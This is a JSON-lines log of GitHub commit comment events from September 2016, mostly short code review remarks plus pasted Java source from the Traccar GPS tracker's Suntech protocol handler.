{"id":"4599069348","type":"CommitCommentEvent","actor":{"login":"Turbovix"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19121108,"position":null,"line":null,"path":null,"commit_id":"2d595441ba2470fdec01564f25e4b6a11e5a76a6","created_at":"2016-09-21T21:30:42Z","updated_at":"2016-09-21T21:30:42Z","body":"` super(\"suntech\");\r\n          setSupportedCommands(\r\n                  Command.TYPE_ENGINE_STOP,\r\n                  Command.TYPE_ENGINE_STOP,\r\n                  Command.TYPE_ENGINE_RESUME,\r\n                  Command.TYPE_ALARM_ARM,\r\n                  Command.TYPE_ALARM_DISARM);\r\n      }`"}},"created_at":"2016-09-21T21:30:42Z"}
{"id":"4599070756","type":"CommitCommentEvent","actor":{"login":"jmaguire1"},"repo":{"name":"NREL/OpenStudio-BEopt"},"payload":{"comment":{"id":19121110,"position":9,"line":170,"path":"measures/ResidentialHotWaterDistribution/measure.rb","commit_id":"23bd4a834aaa369ec731b1586526dd93d72f581d","created_at":"2016-09-21T21:30:59Z","updated_at":"2016-09-21T21:30:59Z","body":"Noted, here and on the extra debug statements I forgot to remove"}},"created_at":"2016-09-21T21:30:59Z"}
{"id":"4599073828","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19121118,"position":null,"line":null,"path":null,"commit_id":"338a06c4c248ab17bd82a1a76b8c76a4ef95c224","created_at":"2016-09-21T21:31:35Z","updated_at":"2016-09-21T21:31:35Z","body":"overall comment"}},"created_at":"2016-09-21T21:31:35Z"}
{"id":"4599075935","type":"CommitCommentEvent","actor":{"login":"jimlawton"},"repo":{"name":"mattcarberry/virtualagc"},"payload":{"comment":{"id":19121124,"position":125,"line":149,"path":"Aurora12/ASCENT_INERTIA_UPDATER.agc","commit_id":"fc9be773b8f6adf536a6822209f3a09847d857b4","created_at":"2016-09-21T21:32:00Z","updated_at":"2016-09-21T21:32:00Z","body":"Mike, I don't think that's a division symbol. I think it's just a \"+\". Those line-printer heads are always doing stuff like this. The (+16) is a common enough notation they used I think."}},"created_at":"2016-09-21T21:32:00Z"}
{"id":"4599077612","type":"CommitCommentEvent","actor":{"login":"Turbovix"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19121130,"position":null,"line":null,"path":null,"commit_id":"80bbc136baf6a91b967732fdae4238f827b9bf19","created_at":"2016-09-21T21:32:19Z","updated_at":"2016-09-21T21:32:19Z","body":"case Command.TYPE_ALARM_ARM:\r\n                return formatCommand(command, \"SA200CMD;{%s};02;Enable2\\r\", Command.KEY_UNIQUE_ID);\r\n            case Command.TYPE_ALARM_DISARM:\r\n                return formatCommand(command, \"SA200CMD;{%s};02;Disable2\\r\", Command.KEY_UNIQUE_ID);\r\n            default:"}},"created_at":"2016-09-21T21:32:19Z"}
{"id":"4599082148","type":"CommitCommentEvent","actor":{"login":"stilllogic20"},"repo":{"name":"stilllogic20/ccminer-lyra"},"payload":{"comment":{"id":19121140,"position":null,"line":null,"path":null,"commit_id":"9da9231bab050ef18b5a936e694ded1b1782ef69","created_at":"2016-09-21T21:33:14Z","updated_at":"2016-09-21T21:33:14Z","body":"外周ループのアンロールは基本的に行いません"}},"created_at":"2016-09-21T21:33:14Z"}
{"id":"4599083269","type":"CommitCommentEvent","actor":{"login":"magzupao"},"repo":{"name":"magzupao/datasharing"},"payload":{"comment":{"id":19121146,"position":null,"line":null,"path":null,"commit_id":"e53857faa461f24c0834f64f791233d602decf5f","created_at":"2016-09-21T21:33:27Z","updated_at":"2016-09-21T21:33:27Z","body":"Update"}},"created_at":"2016-09-21T21:33:27Z"}
{"id":"4599089638","type":"CommitCommentEvent","actor":{"login":"uglyog"},"repo":{"name":"DiUS/pact-jvm"},"payload":{"comment":{"id":19121163,"position":23,"line":23,"path":"CHANGELOG.md","commit_id":"a209a8cc6a47c37690c55c978f33655a0d754608","created_at":"2016-09-21T21:34:45Z","updated_at":"2016-09-21T21:34:45Z","body":"Correct, but 3.3.x is built of master, while 3.5.x is built off the V3 spec branch which did not have this until I merged it in."}},"created_at":"2016-09-21T21:34:45Z"}
{"id":"4599092005","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19121175,"position":null,"line":null,"path":null,"commit_id":"7d7c0304a6b5af80cccf7606d5ba7be3ade024bd","created_at":"2016-09-21T21:35:13Z","updated_at":"2016-09-21T21:35:13Z","body":"I've been meaning to make PacketManager an interface, considering all we need is the NGCP Hashing, taken care of by the ABSPacket, we don't need native C++ PacketManager, we can make our own."}},"created_at":"2016-09-21T21:35:13Z"}
{"id":"4599094548","type":"CommitCommentEvent","actor":{"login":"rascarlo"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19121179,"position":null,"line":null,"path":null,"commit_id":"9e285ba5a10bcb01df1e41ed07d03e10e53aba71","created_at":"2016-09-21T21:35:43Z","updated_at":"2016-09-21T21:35:43Z","body":"awesome, thanks :+1: "}},"created_at":"2016-09-21T21:35:43Z"}
{"id":"4599094971","type":"CommitCommentEvent","actor":{"login":"mickaelandrieu"},"repo":{"name":"symfony/symfony-docs"},"payload":{"comment":{"id":19121181,"position":21,"line":1326,"path":"reference/configuration/framework.rst","commit_id":"6f50d90ada95e01dfbf6ad240ba8df14a8a8aa5c","created_at":"2016-09-21T21:35:48Z","updated_at":"2016-09-21T21:35:48Z","body":"👍  "}},"created_at":"2016-09-21T21:35:48Z"}
{"id":"4599102141","type":"CommitCommentEvent","actor":{"login":"navv1234"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":19121209,"position":null,"line":null,"path":null,"commit_id":"2146b8b30b2b57222f55e2e9ff2bd6204ab43ce8","created_at":"2016-09-21T21:37:14Z","updated_at":"2016-09-21T21:37:14Z","body":"The problem is not the damage, I should think. It's the fact that Blizzard hotfixed the trinket RPPM and decided not to tell us what the new hotfixed value is?"}},"created_at":"2016-09-21T21:37:14Z"}
{"id":"4599106514","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":19121218,"position":null,"line":null,"path":null,"commit_id":"b631370dfcfa178a665c8732cbc9ba60932be6b4","created_at":"2016-09-21T21:38:06Z","updated_at":"2016-09-21T21:38:06Z","body":"Entry_ID pls"}},"created_at":"2016-09-21T21:38:06Z"}
{"id":"4599111492","type":"CommitCommentEvent","actor":{"login":"lassoan"},"repo":{"name":"SlicerIGT/SlicerIGT"},"payload":{"comment":{"id":19121230,"position":20,"line":456,"path":"PivotCalibration/Logic/vtkSlicerPivotCalibrationLogic.cxx","commit_id":"80106cce77376eb13399aa08d9da6ac862e8b532","created_at":"2016-09-21T21:39:08Z","updated_at":"2016-09-21T21:39:08Z","body":"The idea is that we always want the toolTipToTool translation in the Shaft coordinate system to point to a specific direction.\r\nMaybe toolTipToToolTranslation3_Shaft should be normalized?"}},"created_at":"2016-09-21T21:39:08Z"}
{"id":"4599117542","type":"CommitCommentEvent","actor":{"login":"Xika1024"},"repo":{"name":"Xika1024/ComponentObject"},"payload":{"comment":{"id":19121245,"position":null,"line":null,"path":null,"commit_id":"f6b7f5e7d8cea6b3ca454f91ffcb298c3bdee23b","created_at":"2016-09-21T21:40:21Z","updated_at":"2016-09-21T21:40:21Z","body":"创建了个什么鬼？"}},"created_at":"2016-09-21T21:40:21Z"}
{"id":"4599119490","type":"CommitCommentEvent","actor":{"login":"kostya"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":19121259,"position":5,"line":213,"path":"src/string.cr","commit_id":"d657b9a53830b6e3c3771cf8afeb4e68172c147e","created_at":"2016-09-21T21:40:44Z","updated_at":"2016-09-21T21:40:44Z","body":"so after overflow there be a super big number? may be disallow big numbers in GC.malloc_atomic?"}},"created_at":"2016-09-21T21:40:44Z"}
{"id":"4599121270","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19121265,"position":null,"line":null,"path":null,"commit_id":"02e2a4f0910c2b2b20b0f172d71089c0fbe5273b","created_at":"2016-09-21T21:41:07Z","updated_at":"2016-09-21T21:41:07Z","body":"Wow, terrifying."}},"created_at":"2016-09-21T21:41:07Z"}
{"id":"4599122285","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":19121269,"position":13,"line":154,"path":"app/controllers/categories_controller.rb","commit_id":"641b95f655f0f653e3f0602d01729545ae8450ab","created_at":"2016-09-21T21:41:18Z","updated_at":"2016-09-21T21:41:18Z","body":"hmm I think don't think quite agree with this fix. Perhaps the approach should be to fix the bug client side and have the `UploadUrlValidator` check for invalid URL server side. :thought_balloon:  "}},"created_at":"2016-09-21T21:41:18Z"}
{"id":"4599122633","type":"CommitCommentEvent","actor":{"login":"viciousviper"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19121271,"position":null,"line":null,"path":null,"commit_id":"42e7a7b3129d5536aefdcea355330f7d6971a630","created_at":"2016-09-21T21:41:23Z","updated_at":"2016-09-21T21:41:23Z","body":"Yay, you made it at last! Congratulations on finishing the 1.0 final release!"}},"created_at":"2016-09-21T21:41:23Z"}
{"id":"4599125845","type":"CommitCommentEvent","actor":{"login":"rnewman"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19121280,"position":null,"line":null,"path":null,"commit_id":"02e2a4f0910c2b2b20b0f172d71089c0fbe5273b","created_at":"2016-09-21T21:42:05Z","updated_at":"2016-09-21T21:42:05Z","body":"Some of this is an abundance of caution — I got in the habit of just adding them before I used them."}},"created_at":"2016-09-21T21:42:05Z"}
{"id":"4599125966","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19121281,"position":3,"line":3,"path":"src/browser/datomish/cljify.cljs","commit_id":"99cd1ca4f4e7537371509cdfcca115ac0f7e8cfc","created_at":"2016-09-21T21:42:07Z","updated_at":"2016-09-21T21:42:07Z","body":"This could really use some tests, and it would be nice to try to make `js->clj` hard to use."}},"created_at":"2016-09-21T21:42:07Z"}
{"id":"4599128846","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19121288,"position":null,"line":null,"path":null,"commit_id":"eff536c5239fdd16a6b96bdcdc7b6456a58c349d","created_at":"2016-09-21T21:42:42Z","updated_at":"2016-09-21T21:42:42Z","body":"128792325-Issue5803 (wfbuhl) - x86_64-MacOS-10.9-clang: OK (2289 of 2324 tests passed, 534 test warnings)\n\n * 564 tests had: AUD diffs.\n * 119 tests had: ERR diffs.\n * 29 tests had: Table big diffs.\n * 185 tests had: EIO diffs.\n * 28 tests had: ESO small diffs.\n * 14 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 5 tests had: MTR big diffs.\n * 24 tests had: RDD diffs.\n * 14 tests had: MTR small diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.49%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T21:42:42Z"}
{"id":"4599133711","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19121298,"position":15,"line":36,"path":"src/common/datomish/js.cljs","commit_id":"5b4800556bd8746807a6e64df21336dcd8a75e9f","created_at":"2016-09-21T21:43:41Z","updated_at":"2016-09-21T21:43:41Z","body":"Why aren't these all `cljify` instead of `js->clj`?"}},"created_at":"2016-09-21T21:43:41Z"}
{"id":"4599134778","type":"CommitCommentEvent","actor":{"login":"kmanojkumar"},"repo":{"name":"kmanojkumar/Jagrit-Vinit-Jeel-Mansi-Manoj"},"payload":{"comment":{"id":19121303,"position":null,"line":null,"path":null,"commit_id":"cf54c6cedd59178d415bba983cf22b41b835b1b3","created_at":"2016-09-21T21:43:54Z","updated_at":"2016-09-21T21:43:54Z","body":"Your document is so well written according to IEEE, that we had no choice than referring it."}},"created_at":"2016-09-21T21:43:54Z"}
{"id":"4599135118","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19121308,"position":34,"line":55,"path":"src/common/datomish/js.cljs","commit_id":"5b4800556bd8746807a6e64df21336dcd8a75e9f","created_at":"2016-09-21T21:43:59Z","updated_at":"2016-09-21T21:43:59Z","body":"I think you should drop `println` in general, but definitely don't do it twice :)"}},"created_at":"2016-09-21T21:43:59Z"}
{"id":"4599137073","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":19121310,"position":null,"line":null,"path":null,"commit_id":"df59b59bd67e632f4043619f8b4af01231321c74","created_at":"2016-09-21T21:44:22Z","updated_at":"2016-09-21T21:44:22Z","body":"@loechel Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/56/violations\n```\nplone/namedfile/scaling.py:173:1: C901 'DefaultImageScalingFactory.__call__' is too complex (13)\nplone/namedfile/utils/__init__.py:176:1: C901 'rotate_image' is too complex (17)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-21T21:44:22Z"}
{"id":"4599145581","type":"CommitCommentEvent","actor":{"login":"Celebrated"},"repo":{"name":"promac2k/MyBotNewTrainSystem"},"payload":{"comment":{"id":19121328,"position":null,"line":null,"path":null,"commit_id":"f324ce8748d5b9c5715612adfb994fecec73892d","created_at":"2016-09-21T21:46:00Z","updated_at":"2016-09-21T21:46:00Z","body":"MBRBot.dll change is only Coz of Air Defense icon for Weak base option in GUI ! there was no Air Defense icon in MBRBot.dll, so i forced to create that and change dll"}},"created_at":"2016-09-21T21:46:00Z"}
{"id":"4599146836","type":"CommitCommentEvent","actor":{"login":"Tobschinski"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":19121335,"position":null,"line":null,"path":null,"commit_id":"b631370dfcfa178a665c8732cbc9ba60932be6b4","created_at":"2016-09-21T21:46:14Z","updated_at":"2016-09-21T21:46:14Z","body":"èntrý_îd"}},"created_at":"2016-09-21T21:46:14Z"}
{"id":"4599148570","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19121341,"position":13,"line":821,"path":"test/datomish/db_test.cljc","commit_id":"5b4800556bd8746807a6e64df21336dcd8a75e9f","created_at":"2016-09-21T21:46:35Z","updated_at":"2016-09-21T21:46:35Z","body":"OK, this does make sense, and it's certainly nicer than trying to make the keywords, etc manually."}},"created_at":"2016-09-21T21:46:35Z"}
{"id":"4599154580","type":"CommitCommentEvent","actor":{"login":"Turbovix"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19121358,"position":null,"line":null,"path":null,"commit_id":"80bbc136baf6a91b967732fdae4238f827b9bf19","created_at":"2016-09-21T21:47:46Z","updated_at":"2016-09-21T21:47:46Z","body":"> \r\n/*\r\n * Copyright 2015 - 2016 Anton Tananaev (anton.tananaev@gmail.com)\r\n *\r\n * Licensed under the Apache License, Version 2.0 (the \"License\");\r\n * you may not use this file except in compliance with the License.\r\n * You may obtain a copy of the License at\r\n *\r\n *     http://www.apache.org/licenses/LICENSE-2.0\r\n *\r\n * Unless required by applicable law or agreed to in writing, software\r\n * distributed under the License is distributed on an \"AS IS\" BASIS,\r\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n * See the License for the specific language governing permissions and\r\n * limitations under the License.\r\n */\r\npackage org.traccar.protocol;\r\n\r\nimport org.jboss.netty.bootstrap.ServerBootstrap;\r\nimport org.jboss.netty.channel.ChannelPipeline;\r\nimport org.jboss.netty.handler.codec.string.StringDecoder;\r\nimport org.jboss.netty.handler.codec.string.StringEncoder;\r\nimport org.traccar.BaseProtocol;\r\nimport org.traccar.CharacterDelimiterFrameDecoder;\r\nimport org.traccar.TrackerServer;\r\nimport org.traccar.model.Command;\r\n\r\nimport java.util.List;\r\n\r\npublic class SuntechProtocol extends BaseProtocol {\r\n\r\n    public SuntechProtocol() {\r\n        super(\"suntech\");\r\n        setSupportedCommands(\r\n                Command.TYPE_OUTPUT_CONTROL,\r\n                Command.TYPE_REBOOT_DEVICE,\r\n                Command.TYPE_POSITION_SINGLE,\r\n                Command.TYPE_ENGINE_STOP,\r\n                Command.TYPE_ENGINE_RESUME,\r\n                Command.TYPE_ALARM_ARM,\r\n                Command.TYPE_ALARM_DISARM,\r\n               \r\n    }\r\n\r\n    @Override\r\n    public void initTrackerServers(List<TrackerServer> serverList) {\r\n        serverList.add(new TrackerServer(new ServerBootstrap(), getName()) {\r\n            @Override\r\n            protected void addSpecificHandlers(ChannelPipeline pipeline) {\r\n                pipeline.addLast(\"frameDecoder\", new CharacterDelimiterFrameDecoder(1024, '\\r'));\r\n                pipeline.addLast(\"stringEncoder\", new StringEncoder());\r\n                pipeline.addLast(\"stringDecoder\", new StringDecoder());\r\n                pipeline.addLast(\"objectEncoder\", new SuntechProtocolEncoder());\r\n                pipeline.addLast(\"objectDecoder\", new SuntechProtocolDecoder(SuntechProtocol.this));\r\n            }\r\n        });\r\n    }\r\n\r\n}"}},"created_at":"2016-09-21T21:47:46Z"}
{"id":"4599157800","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19121370,"position":43,"line":43,"path":"addon/src/index.js","commit_id":"93793a2efddef17136b6a42c185c1b3fdcbfc0d5","created_at":"2016-09-21T21:48:26Z","updated_at":"2016-09-21T21:48:26Z","body":"Backticks for multline?  Backticks with no substitution is kind of evil :)"}},"created_at":"2016-09-21T21:48:26Z"}
{"id":"4599158790","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19121372,"position":74,"line":74,"path":"addon/src/index.js","commit_id":"93793a2efddef17136b6a42c185c1b3fdcbfc0d5","created_at":"2016-09-21T21:48:38Z","updated_at":"2016-09-21T21:48:38Z","body":"Drop the commented part."}},"created_at":"2016-09-21T21:48:38Z"}
{"id":"4599160859","type":"CommitCommentEvent","actor":{"login":"abikg71"},"repo":{"name":"abikg71/CS-2050-HWs"},"payload":{"comment":{"id":19121378,"position":null,"line":null,"path":null,"commit_id":"ca6db08e918db837c1c6615aac7741d7ea1b9181","created_at":"2016-09-21T21:49:03Z","updated_at":"2016-09-21T21:49:03Z","body":"Chapter #2 Homework solutions "}},"created_at":"2016-09-21T21:49:03Z"}
{"id":"4599161078","type":"CommitCommentEvent","actor":{"login":"Turbovix"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19121379,"position":null,"line":null,"path":null,"commit_id":"8ed94697f46788d56d71551940b2f4f4778bb9de","created_at":"2016-09-21T21:49:05Z","updated_at":"2016-09-21T21:49:05Z","body":"/*\r\n * Copyright 2015 - 2016 Anton Tananaev (anton.tananaev@gmail.com)\r\n *\r\n * Licensed under the Apache License, Version 2.0 (the \"License\");\r\n * you may not use this file except in compliance with the License.\r\n * You may obtain a copy of the License at\r\n *\r\n *     http://www.apache.org/licenses/LICENSE-2.0\r\n *\r\n * Unless required by applicable law or agreed to in writing, software\r\n * distributed under the License is distributed on an \"AS IS\" BASIS,\r\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n * See the License for the specific language governing permissions and\r\n * limitations under the License.\r\n */\r\npackage org.traccar.protocol;\r\n\r\nimport org.jboss.netty.bootstrap.ServerBootstrap;\r\nimport org.jboss.netty.channel.ChannelPipeline;\r\nimport org.jboss.netty.handler.codec.string.StringDecoder;\r\nimport org.jboss.netty.handler.codec.string.StringEncoder;\r\nimport org.traccar.BaseProtocol;\r\nimport org.traccar.CharacterDelimiterFrameDecoder;\r\nimport org.traccar.TrackerServer;\r\nimport org.traccar.model.Command;\r\n\r\nimport java.util.List;\r\n\r\npublic class SuntechProtocol extends BaseProtocol {\r\n\r\n    public SuntechProtocol() {\r\n        super(\"suntech\");\r\n        setSupportedCommands(\r\n                Command.TYPE_OUTPUT_CONTROL,\r\n                Command.TYPE_REBOOT_DEVICE,\r\n                Command.TYPE_POSITION_SINGLE,\r\n                Command.TYPE_ENGINE_STOP,\r\n                Command.TYPE_ENGINE_RESUME,\r\n                Command.TYPE_ALARM_ARM,\r\n                Command.TYPE_ALARM_DISARM,\r\n              \r\n    }\r\n\r\n    @Override\r\n    public void initTrackerServers(List<TrackerServer> serverList) {\r\n        serverList.add(new TrackerServer(new ServerBootstrap(), getName()) {\r\n            @Override\r\n            protected void addSpecificHandlers(ChannelPipeline pipeline) {\r\n                pipeline.addLast(\"frameDecoder\", new CharacterDelimiterFrameDecoder(1024, '\\r'));\r\n                pipeline.addLast(\"stringEncoder\", new StringEncoder());\r\n                pipeline.addLast(\"stringDecoder\", new StringDecoder());\r\n                pipeline.addLast(\"objectEncoder\", new SuntechProtocolEncoder());\r\n                pipeline.addLast(\"objectDecoder\", new SuntechProtocolDecoder(SuntechProtocol.this));\r\n            }\r\n        });\r\n    }\r\n\r\n}"}},"created_at":"2016-09-21T21:49:05Z"}
{"id":"4599162564","type":"CommitCommentEvent","actor":{"login":"Twintop"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":19121382,"position":null,"line":null,"path":null,"commit_id":"2146b8b30b2b57222f55e2e9ff2bd6204ab43ce8","created_at":"2016-09-21T21:49:25Z","updated_at":"2016-09-21T21:49:25Z","body":"Yeah, that looks more like it to me. Let me revert this change...."}},"created_at":"2016-09-21T21:49:25Z"}
{"id":"4599162968","type":"CommitCommentEvent","actor":{"login":"mateocorrea"},"repo":{"name":"mateocorrea/MBlocks"},"payload":{"comment":{"id":19121387,"position":null,"line":null,"path":null,"commit_id":"ac524fb60cdf37351bd14b73e6da155a13e19101","created_at":"2016-09-21T21:49:30Z","updated_at":"2016-09-21T21:49:30Z","body":"Should have been named \"Integration of a Block's data and it's visualiztion\"\r\n"}},"created_at":"2016-09-21T21:49:30Z"}
{"id":"4599163132","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19121389,"position":1,"line":1,"path":"addon/src/wrapper.prefix","commit_id":"93793a2efddef17136b6a42c185c1b3fdcbfc0d5","created_at":"2016-09-21T21:49:32Z","updated_at":"2016-09-21T21:49:32Z","body":"I feel like this might be required only because of `cljs-promises`.  We should investigate and try to fix upstream."}},"created_at":"2016-09-21T21:49:32Z"}
{"id":"4599169319","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19121406,"position":22,"line":29,"path":"src/common/datomish/js.cljs","commit_id":"93793a2efddef17136b6a42c185c1b3fdcbfc0d5","created_at":"2016-09-21T21:50:51Z","updated_at":"2016-09-21T21:50:51Z","body":"Eh?  This seems like a generally useful utility, and one that shouldn't `println`.  Consider making `f` optional."}},"created_at":"2016-09-21T21:50:51Z"}
{"id":"4599169671","type":"CommitCommentEvent","actor":{"login":"navv1234"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":19121407,"position":null,"line":null,"path":null,"commit_id":"2146b8b30b2b57222f55e2e9ff2bd6204ab43ce8","created_at":"2016-09-21T21:50:56Z","updated_at":"2016-09-21T21:50:56Z","body":"Rather do ```effect.ppm_ = -1.5``` I think for now. I'll need to adjust our exporter to blacklist some fields for hotfixing, but that'll take a bit."}},"created_at":"2016-09-21T21:50:56Z"}
{"id":"4599170587","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19121412,"position":65,"line":61,"path":"src/common/datomish/js.cljs","commit_id":"93793a2efddef17136b6a42c185c1b3fdcbfc0d5","created_at":"2016-09-21T21:51:07Z","updated_at":"2016-09-21T21:51:07Z","body":"Ah, you're addressing my earlier comment here."}},"created_at":"2016-09-21T21:51:07Z"}
{"id":"4599171246","type":"CommitCommentEvent","actor":{"login":"Turbovix"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19121414,"position":null,"line":null,"path":null,"commit_id":"80bbc136baf6a91b967732fdae4238f827b9bf19","created_at":"2016-09-21T21:51:15Z","updated_at":"2016-09-21T21:51:15Z","body":"> \r\n/*\r\n * Copyright 2015 - 2016 Anton Tananaev (anton.tananaev@gmail.com)\r\n *\r\n * Licensed under the Apache License, Version 2.0 (the \"License\");\r\n * you may not use this file except in compliance with the License.\r\n * You may obtain a copy of the License at\r\n *\r\n *     http://www.apache.org/licenses/LICENSE-2.0\r\n *\r\n * Unless required by applicable law or agreed to in writing, software\r\n * distributed under the License is distributed on an \"AS IS\" BASIS,\r\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n * See the License for the specific language governing permissions and\r\n * limitations under the License.\r\n */\r\npackage org.traccar.protocol;\r\n\r\nimport org.traccar.StringProtocolEncoder;\r\nimport org.traccar.helper.Log;\r\nimport org.traccar.model.Command;\r\n\r\npublic class SuntechProtocolEncoder extends StringProtocolEncoder {\r\n\r\n    @Override\r\n    protected Object encodeCommand(Command command) {\r\n\r\n        switch (command.getType()) {\r\n            case Command.TYPE_REBOOT_DEVICE:\r\n                return formatCommand(command, \"SA200CMD;{%s};02;Reboot\\r\", Command.KEY_UNIQUE_ID);\r\n            case Command.TYPE_POSITION_SINGLE:\r\n                return formatCommand(command, \"SA200CMD;{%s};02;StatusReq\\r\", Command.KEY_UNIQUE_ID);\r\n            case Command.TYPE_OUTPUT_CONTROL:\r\n                if (command.getAttributes().containsKey(Command.KEY_DATA)) {\r\n                    if (command.getAttributes().get(Command.KEY_DATA).equals(\"1\")) {\r\n                        return formatCommand(command, \"SA200CMD;{%s};02;Enable{%s}\\r\",\r\n                                Command.KEY_UNIQUE_ID, Command.KEY_INDEX);\r\n                    } else {\r\n                        return formatCommand(command, \"SA200CMD;{%s};02;Disable{%s}\\r\",\r\n                                Command.KEY_UNIQUE_ID, Command.KEY_INDEX);\r\n                    }\r\n                }\r\n            case Command.TYPE_ENGINE_STOP:\r\n                return formatCommand(command, \"SA200CMD;{%s};02;Enable1\\r\", Command.KEY_UNIQUE_ID);\r\n            case Command.TYPE_ENGINE_RESUME:\r\n                return formatCommand(command, \"SA200CMD;{%s};02;Disable1\\r\", Command.KEY_UNIQUE_ID);\r\n            case Command.TYPE_ALARM_ARM:\r\n                return formatCommand(command, \"SA200CMD;{%s};02;Enable2\\r\", Command.KEY_UNIQUE_ID);\r\n            case Command.TYPE_ALARM_DISARM:\r\n                return formatCommand(command, \"SA200CMD;{%s};02;Disable2\\r\", Command.KEY_UNIQUE_ID);\r\n            default:\r\n                Log.warning(new UnsupportedOperationException(command.getType()));\r\n                break;\r\n        }\r\n\r\n        return null;\r\n    }\r\n\r\n}"}},"created_at":"2016-09-21T21:51:15Z"}
{"id":"4599172501","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19121419,"position":78,"line":71,"path":"src/common/datomish/js.cljs","commit_id":"93793a2efddef17136b6a42c185c1b3fdcbfc0d5","created_at":"2016-09-21T21:51:32Z","updated_at":"2016-09-21T21:51:32Z","body":"Maybe we want `go-promise`?"}},"created_at":"2016-09-21T21:51:32Z"}
{"id":"4599175306","type":"CommitCommentEvent","actor":{"login":"tavaughan"},"repo":{"name":"SlicerIGT/SlicerIGT"},"payload":{"comment":{"id":19121425,"position":20,"line":456,"path":"PivotCalibration/Logic/vtkSlicerPivotCalibrationLogic.cxx","commit_id":"80106cce77376eb13399aa08d9da6ac862e8b532","created_at":"2016-09-21T21:52:07Z","updated_at":"2016-09-21T21:52:07Z","body":"Normalizing it won't change the outcome, the check is still for a dot product greater than 0.\r\n\r\nI'm not 100% sure I grasp what we're trying to do here, but I'm not sure that using the computed translation is a good idea, because it could be anything depending on the sensor's physical orientation and position with respect to the physical tool tip?"}},"created_at":"2016-09-21T21:52:07Z"}
{"id":"4599175987","type":"CommitCommentEvent","actor":{"login":"yihanz"},"repo":{"name":"yihanz/CC"},"payload":{"comment":{"id":19121427,"position":null,"line":null,"path":null,"commit_id":"09c36c2075bc506539f726c82a8c76f41ec96744","created_at":"2016-09-21T21:52:15Z","updated_at":"2016-09-21T21:52:15Z","body":"[safechoix.org/summer16](url)"}},"created_at":"2016-09-21T21:52:15Z"}
{"id":"4599178105","type":"CommitCommentEvent","actor":{"login":"yihanz"},"repo":{"name":"yihanz/CC"},"payload":{"comment":{"id":19121431,"position":null,"line":null,"path":null,"commit_id":"09c36c2075bc506539f726c82a8c76f41ec96744","created_at":"2016-09-21T21:52:42Z","updated_at":"2016-09-21T21:52:42Z","body":"[safechoix.org/summer16](url)"}},"created_at":"2016-09-21T21:52:42Z"}
